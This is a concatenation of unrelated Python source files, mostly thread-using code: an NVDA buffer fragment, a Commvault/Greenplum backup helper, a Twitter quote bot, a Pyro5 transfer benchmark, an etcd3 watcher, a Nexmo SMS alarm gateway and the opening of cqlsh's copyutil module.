return (range._endOffset-range._startOffset)>=self.NOT_LINK_BLOCK_MIN_LEN
def getEnclosingContainerRange(self,range):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in range.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets=range._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
"""Handle an update to this buffer.
"""
if not self.VBufHandle:
# #4859: The buffer was unloaded after this method was queued.
return
braille.handler.handleUpdate(self)
def getControlFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = unicode(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
__gestures = {
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
}
|
CvContext.py
|
#!/usr/bin/env python
#
# Copyright (c) Commvault Systems (2016). All Rights Reserved.
#
'''
Commvault integration with Greenplum data protection
This Module contains some helper functions for storing information needed
to run Greenplum backup and restore using Commvault
Typical usage:
from gppylib import CvContext
CvCtx = CvContext()
if options.verbose:
gplog.enable_verbose_logging()
if options.quiet:
gplog.quiet_stdout_logging()
logger.info("Start myTool")
...
'''
import datetime
import os
import errno
import sys
import re
from gppylib import gplog
from gppylib.commands.base import Command
import threading
import time
from Queue import Queue
import fcntl
try:
import subprocess32 as subprocess
except:
import subprocess
logger = gplog.get_default_logger()
class CvContext():
def __init__(self, cv_clientname, cv_instance, cv_proxy_host, cv_proxy_port, cv_proxy_file, cv_dbname=None, cv_jobType='BACKUP', incremental=False, verbose=False, debuglevel=0):
#-- Initialize context
self.cv_job_id = 0
self.cv_job_token = 0
self._commcellid = 0
self.cv_clientid = 0
self.cv_instanceid = 0
self._cv_subclient_id = 0
self.cv_appid = '0:0'
self.cv_backupsetid = 0
self.cv_jobstatus = 1
self.cv_prefix = None
self._backup_file_list = []
self._backup_file_guids = {}
self.cv_apptype = 'Q_DISTRIBUTED_IDA'
self.cv_logfile = os.path.dirname(gplog.get_logfile()) + "/cv_backup.log"
if debuglevel > 0:
self.cv_debuglvl = debuglevel
elif verbose:
self.cv_debuglvl = 1
else:
self.cv_debuglvl = 0
self.queue = Queue()
logger.debug("Logging Commvault-specific entries to: %s\n", self.cv_logfile)
if cv_clientname is not None:
self.cv_clientname = cv_clientname
if cv_instance is not None:
self.cv_instance = cv_instance
command_string = "CVBkpRstWrapper -jobStart --cv-streams 1 --cv-clientname %s --cv-instance %s --cv-debuglvl %s" % (self.cv_clientname, self.cv_instance, self.cv_debuglvl)
if cv_dbname is not None:
self.cv_subclient = "cv%s" % cv_dbname
command_string += " --cv-subclient %s" % self.cv_subclient
if cv_jobType == "RESTORE":
command_string += " --cv-jobtype RESTORE"
else:
command_string += " --cv-jobtype BACKUP"
if incremental:
command_string += " --cv-bkplvl INCR"
else:
command_string += " --cv-bkplvl FULL"
if cv_proxy_host is not None:
self.cv_proxy_host = cv_proxy_host
if cv_proxy_port is not None:
self.cv_proxy_port = cv_proxy_port
else:
self.cv_proxy_port = 8400
command_string += " --cv-proxy-host %s --cv-proxy-port %s" % (self.cv_proxy_host, self.cv_proxy_port)
elif cv_proxy_file is not None:
self.cv_proxy_file = cv_proxy_file
command_string += " --cv-apptype Q_DISTRIBUTED_IDA"
#-- Start a polling thread for CVBkpRStWrapper wrapper
t = threading.Thread(target=cv_job_controller, name='cv_job_controller',args=[self,command_string],kwargs={})
t.start()
def get_backup_files(self, timestamp, dbname=None):
if timestamp > 0:
logger.debug("Searching for browse times for timestamp %s" % timestamp)
query_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-instanceId %s --cv-backupsetId %s --cv-filename \"*%s.rpt\" --cv-debuglvl %s --cv-search-allcycles 1" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, self.cv_instanceid, self.cv_backupsetid, timestamp, self.cv_debuglvl)
logger.debug("Command string for get_backup_files: %s\n", query_string)
query = Command("Getting file info from the Commserve", query_string)
query.run(validateAfter=True)
file_info = query.get_results().stdout.split('\n')
if len(file_info) > 0:
for line in file_info:
if len(line.strip()) > 0:
(fname, oguid, cvguid, fromtime, totime, self._commcellid, self._cv_subclient_id) = line.strip().split(':')
self.cv_prefix = fname[(fname.rfind("/") + 1):fname.rfind("gp_")]
self.cv_subclient = self.cv_prefix[:-1]
self.cv_appid = self._commcellid + ":" + self._cv_subclient_id
#command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-instanceId %s --cv-backupsetId %s --cv-filename \"/\" --cv-browse-fromtime %s --cv-browse-totime %s --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, self.cv_instanceid, self.cv_backupsetid, fromtime, totime, self.cv_debuglvl)
command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-filename \"/\" --cv-browse-fromtime %s --cv-browse-totime %s --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, fromtime, totime, self.cv_debuglvl)
else:
raise Exception("No backup files found for timestamp %s" % timestamp)
elif dbname is not None:
command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-instanceId %s --cv-backupsetId %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-filename \"*%s*\" --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_instanceid, self.cv_backupsetid, self.cv_clientid, dbname, self.cv_debuglvl)
else:
command_string = "CVBkpRstWrapper -query --cv-proxy-host %s --cv-proxy-port %s --cv-appid %s --cv-apptype Q_DISTRIBUTED_IDA --cv-clientid %s --cv-filename \"*\" --cv-debuglvl %s" % (self.cv_proxy_host, self.cv_proxy_port, self.cv_appid, self.cv_clientid, self.cv_debuglvl)
logger.debug("Command string for get_backup_files': %s\n", command_string)
cmd = Command("Getting list of backup files from the Commserve", command_string)
cmd.run(validateAfter=True)
files_list = cmd.get_results().stdout.split('\n')
for line in files_list:
if len(line.strip()) > 0:
(fname, oguid, cvguid, self._commcellid, self._cv_subclient_id) = line.strip().split(':')
self._backup_file_guids[fname] = cvguid
logger.debug("Caching file [%s] with GUID [%s]" % (fname, cvguid))
self.cv_appid = self._commcellid + ":" + self._cv_subclient_id
self._backup_file_list = sorted(self._backup_file_guids.keys(), None, None, True)
# For restore scenarios with -s <dbname>
# look for the restore timestamp in the latest backup report file name
if timestamp == 0:
for file in self._backup_file_list:
if ".rpt" in file:
list = file.split('.')
list2 = list[0].split('_')
timestamp = list2.pop()
logger.debug("Found restore timestamp=%s for database=%s",timestamp, dbname)
break
self.cv_prefix = "cv" + dbname + "_"
return timestamp
def get_file_guid(self, fname):
for file in self._backup_file_list:
if os.path.basename(fname) == os.path.basename(file):
return self._backup_file_guids[file]
return False
def cv_exit(self):
#self.cv_context.queue.task_done()
if not self.processHandle.poll():
logger.debug("Sending GP exit status (%d) to CVBkpRstWrapper",self.cv_jobstatus)
named_fifo = "/tmp/CVBkpRstWrapper_read_fifo"
fd = -1
try:
fd = os.open(named_fifo, os.O_WRONLY| os.O_NONBLOCK)
os.write(fd, '%d'%self.cv_jobstatus)
except OSError as err:
logger.debug("CVBkpRstWrapper is NOT listening for GP exit status. errno=%d",err.errno)
#fcntl.fcntl(fd, fcntl.F_SETFL, os.O_NDELAY | os.O_NONBLOCK)
if fd is not -1:
os.close(fd)
return self.cv_jobstatus
def cv_job_controller(cv_context, command_string):
logger.debug("Command string for initializing CV context: %s",command_string)
#cmd = Command("CVContext", command_string)
#cmd.run(validateAfter=True)
wrapperOutput = ''
args = command_string.split()
cv_context.processHandle = subprocess.Popen(args, stdout=subprocess.PIPE)
fcntl.fcntl(cv_context.processHandle.stdout, fcntl.F_SETFL, os.O_NDELAY | os.O_NONBLOCK)
firstTime = True
while not cv_context.processHandle.poll():
if firstTime:
logger.debug("Launched CVBkpRstWrapper controller PID:%d", cv_context.processHandle.pid)
firstTime = False
try:
wrapperOutput = cv_context.processHandle.stdout.read()
except IOError:
pass
if wrapperOutput:
logger.debug("Received context %s", wrapperOutput)
wrapperOutput = wrapperOutput.strip()
for cmdToken in wrapperOutput.split(','):
(tokId, tokVal) = cmdToken.split('=')
if tokId == 'commcellId':
cv_context._commcellid = tokVal
elif tokId == 'clientId':
cv_context.cv_clientid = tokVal
elif tokId == 'instanceId':
cv_context.cv_instanceid = tokVal
elif tokId == 'appId':
cv_context._cv_subclient_id = tokVal
elif tokId == 'backupsetId':
cv_context.cv_backupsetid = tokVal
elif tokId == 'jobId':
cv_context.cv_job_id = tokVal
elif tokId == 'jobToken':
cv_context.cv_job_token = tokVal
cv_context.cv_appid = cv_context._commcellid + ":" + cv_context._cv_subclient_id
# Notify the main thread to consume clientId, appId, jobId, jobToken from CvContext object
cv_context.queue.put('CV context updated')
break;
#-- Monitor the CVBkpRstWrapper controller session
while not cv_context.processHandle.poll():
time.sleep(10); #### set polling timer
#logger.debug("CV Thread: Polling CVBkpRstWrapper controller PID [%d]....", cv_context.processHandle.pid)
logger.debug("CVBkpRstWrapper controller session PID [%d] is NOT alive", cv_context.processHandle.pid)
|
app.py
|
from os import replace
from numpy.core.fromnumeric import size
import pandas as pd
import numpy as np
import schedule
from config import create_api
import tweepy
import time
import random
import threading
ht1 = [
'#books', '#bookstagram', '#book', '#booklover', '#reading', '#bookworm', '#bookstagrammer', '#bookish', '#read',
'#booknerd', '#bookaddict', '#bibliophile', '#booksofinstagram', '#instabook', '#bookaholic',
'#bookshelf', '#booksbooksbooks', '#libros', '#readersofinstagram', '#bookphotography',
'#booklove', '#art', '#literature', '#author',
'#quotestagram', '#quotes', '#quoteoftheday', '#quotestoliveby', '#quote', '#inspirationalquotes', '#love',
'#motivationalquotes', '#poetry', '#motivation', '#life', '#inspiration', '#quotesdaily', '#loveyourself',
'#positivevibes','#happy', '#success', '#quotesaboutlife', '#believe', '#selflove',
'#happiness', '#thoughts', '#lifequotes'
]
CHAR_MAX = 280
api = create_api()
df = pd.read_csv('QUOTE.csv', delimiter=';')
dash = '―'
def tweet_now(msg):
try:
api.update_status(msg[0:CHAR_MAX])
except Exception as e:
print(e)
def get_quote(df):
n = df.shape[0]
rand_idx = np.random.choice(n, size=1, replace=False)
row = df.iloc[rand_idx]
df = df.drop(rand_idx)
return row
def get_tweet():
qt = get_quote(df)
quote = qt.iloc[0]['QUOTE']
author = qt.iloc[0]['AUTHOR']
tweet = f'{quote}\n- {author}'
if len(tweet) > CHAR_MAX:
return ''
return tweet
def get_hashtags():
ht = random.sample(ht1, 7)
return '\n' + ' '.join(ht)
def tweet_quote():
tweet = get_tweet()
if len(tweet) == 0:
print('skipping this tweet')
return ''
htag = get_hashtags()
txt = tweet + htag
tweet_now(txt)
print(txt)
def run_threaded(job_fn):
job_thread = threading.Thread(target=job_fn)
job_thread.start()
schedule.every(2).hours.do(run_threaded, tweet_quote)
while True:
schedule.run_pending()
time.sleep(1)
|
client.py
|
import time
import threading
import socket
import zlib
import sys
import serpent
from Pyro5.api import Proxy, current_context
def regular_pyro(uri):
blobsize = 10*1024*1024
num_blobs = 10
total_size = 0
start = time.time()
name = threading.currentThread().name
with Proxy(uri) as p:
for _ in range(num_blobs):
print("thread {0} getting a blob using regular Pyro call...".format(name))
data = p.get_with_pyro(blobsize)
data = serpent.tobytes(data) # in case of serpent encoded bytes
total_size += len(data)
assert total_size == blobsize*num_blobs
duration = time.time() - start
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
def via_iterator(uri):
blobsize = 10*1024*1024
num_blobs = 10
total_size = 0
start = time.time()
name = threading.currentThread().name
with Proxy(uri) as p:
for _ in range(num_blobs):
print("thread {0} getting a blob using remote iterators...".format(name))
for chunk in p.iterator(blobsize):
chunk = serpent.tobytes(chunk) # in case of serpent encoded bytes
total_size += len(chunk)
assert total_size == blobsize*num_blobs
duration = time.time() - start
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
def via_annotation_stream(uri):
name = threading.currentThread().name
start = time.time()
total_size = 0
print("thread {0} downloading via annotation stream...".format(name))
with Proxy(uri) as p:
perform_checksum = False
for progress, checksum in p.annotation_stream(perform_checksum):
chunk = current_context.response_annotations["FDAT"]
if perform_checksum and zlib.crc32(chunk) != checksum:
raise ValueError("checksum error")
total_size += len(chunk)
assert progress == total_size
current_context.response_annotations.clear() # clean them up once we're done with them
duration = time.time() - start
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
def raw_socket(uri):
blobsize = 40*1024*1024
num_blobs = 10
total_size = 0
name = threading.currentThread().name
with Proxy(uri) as p:
print("thread {0} preparing {1} blobs of size {2} Mb".format(name, num_blobs, blobsize/1024.0/1024.0))
blobs = {}
for _ in range(num_blobs):
file_id, blob_address = p.prepare_file_blob(blobsize)
blobs[file_id] = blob_address
start = time.time()
for file_id in blobs:
print("thread {0} retrieving blob using raw socket...".format(name))
blob_address = blobs[file_id]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(tuple(blob_address))
sock.sendall(file_id.encode())
size = 0
chunk = b"dummy"
while chunk:
chunk = sock.recv(60000)
size += len(chunk)
sock.close()
assert size == blobsize
total_size += size
duration = time.time() - start
assert total_size == blobsize * num_blobs
print("thread {0} done, {1:.2f} Mb/sec.".format(name, total_size/1024.0/1024.0/duration))
if __name__ == "__main__":
uri = input("Uri of filetransfer server? ").strip()
print("\n\n**** regular pyro calls ****\n")
t1 = threading.Thread(target=regular_pyro, args=(uri, ))
t2 = threading.Thread(target=regular_pyro, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to continue:")
print("\n\n**** transfer via iterators ****\n")
t1 = threading.Thread(target=via_iterator, args=(uri, ))
t2 = threading.Thread(target=via_iterator, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to continue:")
print("\n\n**** transfer via annotation stream ****\n")
t1 = threading.Thread(target=via_annotation_stream, args=(uri, ))
t2 = threading.Thread(target=via_annotation_stream, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to continue:")
print("\n\n**** raw socket transfers ****\n")
t1 = threading.Thread(target=raw_socket, args=(uri, ))
t2 = threading.Thread(target=raw_socket, args=(uri, ))
t1.start()
t2.start()
t1.join()
t2.join()
input("enter to exit:")
|
watch.py
|
import logging
import threading
import grpc
import six
from six.moves import queue
import etcd3.etcdrpc as etcdrpc
import etcd3.events as events
import etcd3.exceptions as exceptions
import etcd3.utils as utils
_log = logging.getLogger(__name__)
class Watch(object):
def __init__(self, watch_id, iterator=None, etcd_client=None):
self.watch_id = watch_id
self.etcd_client = etcd_client
self.iterator = iterator
def cancel(self):
self.etcd_client.cancel_watch(self.watch_id)
def iterator(self):
if self.iterator is not None:
return self.iterator
raise ValueError('Undefined iterator')
class Watcher(object):
def __init__(self, watchstub, client_closed_event, timeout=None, call_credentials=None,
metadata=None):
self.timeout = timeout
self._watch_stub = watchstub
self._credentials = call_credentials
self._metadata = metadata
self._client_closed_event = client_closed_event
self._lock = threading.Lock()
self._request_queue = queue.Queue(maxsize=10)
self._callbacks = {}
self._callback_thread = None
self._new_watch_cond = threading.Condition(lock=self._lock)
self._new_watch = None
def add_callback(self, key, callback, range_end=None, start_revision=None,
progress_notify=False, filters=None, prev_kv=False):
create_watch = etcdrpc.WatchCreateRequest()
create_watch.key = utils.to_bytes(key)
if range_end is not None:
create_watch.range_end = utils.to_bytes(range_end)
if start_revision is not None:
create_watch.start_revision = start_revision
if progress_notify:
create_watch.progress_notify = progress_notify
if filters is not None:
create_watch.filters = filters
if prev_kv:
create_watch.prev_kv = prev_kv
rq = etcdrpc.WatchRequest(create_request=create_watch)
with self._lock:
# Start the callback thread if it is not yet running.
if not self._callback_thread:
thread_name = 'etcd3_watch_%x' % (id(self),)
self._callback_thread = threading.Thread(name=thread_name,
target=self._run)
self._callback_thread.daemon = True
self._callback_thread.start()
# Only one create watch request can be pending at a time, so if
# there one already, then wait for it to complete first.
while self._new_watch:
self._new_watch_cond.wait()
# Submit a create watch request.
new_watch = _NewWatch(callback)
self._request_queue.put(rq)
self._new_watch = new_watch
# Wait for the request to be completed, or timeout.
self._new_watch_cond.wait(timeout=self.timeout)
self._new_watch = None
# If the request not completed yet, then raise a timeout exception.
if new_watch.id is None and new_watch.err is None:
raise exceptions.WatchTimedOut()
# Raise an exception if the watch request failed.
if new_watch.err:
raise new_watch.err
# Wake up threads stuck on add_callback call if any.
self._new_watch_cond.notify_all()
return new_watch.id
def cancel(self, watch_id):
with self._lock:
callback = self._callbacks.pop(watch_id, None)
if not callback:
return
self._cancel_no_lock(watch_id)
def _run(self):
while not self._client_closed_event.is_set():
response_iter = self._watch_stub.Watch(
_new_request_iter(self._request_queue),
credentials=self._credentials,
metadata=self._metadata)
try:
for rs in response_iter:
self._handle_response(rs)
except grpc.RpcError as err:
with self._lock:
if self._new_watch:
self._new_watch.err = err
self._new_watch_cond.notify_all()
callbacks = self._callbacks
self._callbacks = {}
# Rotate request queue. This way we can terminate one gRPC
# stream and initiate another one whilst avoiding a race
# between them over requests in the queue.
self._request_queue.put(None)
self._request_queue = queue.Queue(maxsize=10)
for callback in six.itervalues(callbacks):
_safe_callback(callback, err)
def _handle_response(self, rs):
with self._lock:
if rs.created:
# If the new watch request has already expired then cancel the
# created watch right away.
if not self._new_watch:
self._cancel_no_lock(rs.watch_id)
return
if rs.compact_revision != 0:
self._new_watch.err = exceptions.RevisionCompactedError(
rs.compact_revision)
return
self._callbacks[rs.watch_id] = self._new_watch.callback
self._new_watch.id = rs.watch_id
self._new_watch_cond.notify_all()
callback = self._callbacks.get(rs.watch_id)
# Ignore leftovers from canceled watches.
if not callback:
return
# The watcher can be safely reused, but adding a new event
# to indicate that the revision is already compacted
# requires api change which would break all users of this
# module. So, raising an exception if a watcher is still
# alive.
if rs.compact_revision != 0:
err = exceptions.RevisionCompactedError(rs.compact_revision)
_safe_callback(callback, err)
self.cancel(rs.watch_id)
return
for event in rs.events:
_safe_callback(callback, events.new_event(event))
def _cancel_no_lock(self, watch_id):
cancel_watch = etcdrpc.WatchCancelRequest()
cancel_watch.watch_id = watch_id
rq = etcdrpc.WatchRequest(cancel_request=cancel_watch)
self._request_queue.put(rq)
class _NewWatch(object):
def __init__(self, callback):
self.callback = callback
self.id = None
self.err = None
def _new_request_iter(_request_queue):
while True:
rq = _request_queue.get()
if rq is None:
return
yield rq
def _safe_callback(callback, event_or_err):
try:
callback(event_or_err)
except Exception:
_log.exception('Watch callback failed')
|
sms.py
|
from os.path import abspath as abspath
from os.path import dirname as dirname
from os.path import join as join
import sys, json
import logging
import nexmo # SMS Provider
from subprocess import call # to execute a shell command
from threading import Thread # to launch an async thread
from datetime import datetime
from utils.util_date import pretty_date
from utils.config_helper import env_config_from_json
from utils.emails import EmailNexmoBalance # for low nexmo balance alert
logger = logging.getLogger('alarm.utils.sms')
conf_filename = 'sms_config_secret.json' # Shall include *secret* for gitignore
module = abspath(dirname(__file__)) # Absolute path of the directory where this program resides
src = abspath(dirname(module)) # Absolute path of the parent directory
project = abspath(dirname(src)) # Absolute path of the parent directory
env = abspath(dirname(project)) # Absolute path of the parent directory
conf_file = join(env, 'home_alarm_CONFIG/', 'software/', conf_filename)
class SmsGateway():
""" Gateway to Nexmo SMS provider.
This class provides a simple method send(text_body)
This class gets configuration from json secret file
Example of call: SmsGateway().send(text_body)
exemple of content of secte conf file
{
"common" : {
"NEXMO_API_KEY" : "foo",
"NEXMO_API_SECRET" : "bar"
"ADMIN_PHONES" : ["33600000000"]
},
"production" : {
"USERS_PHONES" : ["33600000000"]
},
"development" : {
"USERS_PHONES" : ["33600000000"]
}
}
"""
def __init__(self):
# Load secret config (API Key, phone numbers)
try:
self.conf = env_config_from_json(conf_file)
except Exception as e:
logger.exception('Init sms conf failed')
raise
# Create Nexmo instance
try:
self.provider = nexmo.Client(key=self.conf['NEXMO_API_KEY'], secret=self.conf['NEXMO_API_SECRET'])
except Exception as e:
logger.exception('Init Nexmo failed')
raise
def send(self, body, admin_only=None):
""" Start Thread to send asynchronously
"""
if (admin_only):
recipients = self.conf['ADMIN_NUMBER']
else:
recipients = self.conf['RECIPIENTS_NUMBER']
thread = Thread(target=self.thread_send, args=[body, recipients])
thread.start()
def thread_send(self, body, recipients):
""" Call Nexmo API to send SMS
https://developer.nexmo.com/api/sms?utm_source=DEV_REL&utm_medium=github&utm_campaign=python-client-library#send-an-sms
"""
try:
for recipient in recipients:
sms = {}
sms['from'] = self.conf['SENDER_NAME']
sms['to'] = recipient
sms['text'] = body
logger.debug(str(sms))
http_response = self.provider.send_message(sms)
response = http_response['messages'][0]
if response['status'] == '0':
logger.info('SMS sent to %s' % (recipient))
else:
logger.error('SMS Fail to %s Error: %s' % (recipient, response['error-text']))
# log nexmo balance
balance = '%.1f' % (float(response['remaining-balance']))
logger.info('Remaining balance is %s' % (balance))
except Exception as e:
logger.exception('Failed sending SMS')
# Email the balance value to admin
try: EmailNexmoBalance(response['remaining-balance'])
except: pass
class SmsAlarmAlert():
""" This class sends SMS Alert from Alarm Processes.
This class rely on SmsGateway() Class
example of call: SmsAlarmAlert("Info", "Nox", "started")
"""
def __init__(self, level, module, event):
""" Send Sms from Alarm System.
level: Info / Alert / Error
module : Nox / Ext / Other
event : started / stopped / detection
"""
try:
date = pretty_date(datetime.now())
self.sms_gateway = SmsGateway()
body = "Home Alarm %s %s %s %s" % (level, module, event, date)
logger.debug('Sending SMS %s' % (body))
self.sms_gateway.send(body)
except:
logger.exception("Error when sending sms")
return
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import signal
import six
import struct
import sys
import threading
import time
import traceback
import errno
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from random import randint
from io import BytesIO, StringIO
from select import select
from uuid import UUID
from .util import profile_on, profile_off
from six import ensure_str, ensure_text
from six.moves import configparser
from six.moves import range
from six.moves.queue import Queue
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType, VarcharType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cqlshlib.util import profile_on, profile_off
from cqlshlib.cql3handling import CqlRuleSet
from cqlshlib.displaying import NO_COLOR_MAP
from cqlshlib.formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter, BlobType
from cqlshlib.sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return the normalized path but only if there is a filename, we don't want to convert
an empty string (which means no file name) to a dot. Also expand any user variables such as ~ to the full path
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg)
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
None
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception as e:
printmsg('%s: %s' % (e.__class__.__name__, e.message if hasattr(e, 'message') else str(e)))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
while True:
try:
readable, _, _ = select(self._readers, [], [], timeout)
except select.error as exc:
# TODO: PEP 475 in Python 3.5 should make this unnecessary
# Do not abort on window resize:
if exc[0] != errno.EINTR:
raise
else:
break
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop when the timeout specified
has been received but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = configparser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
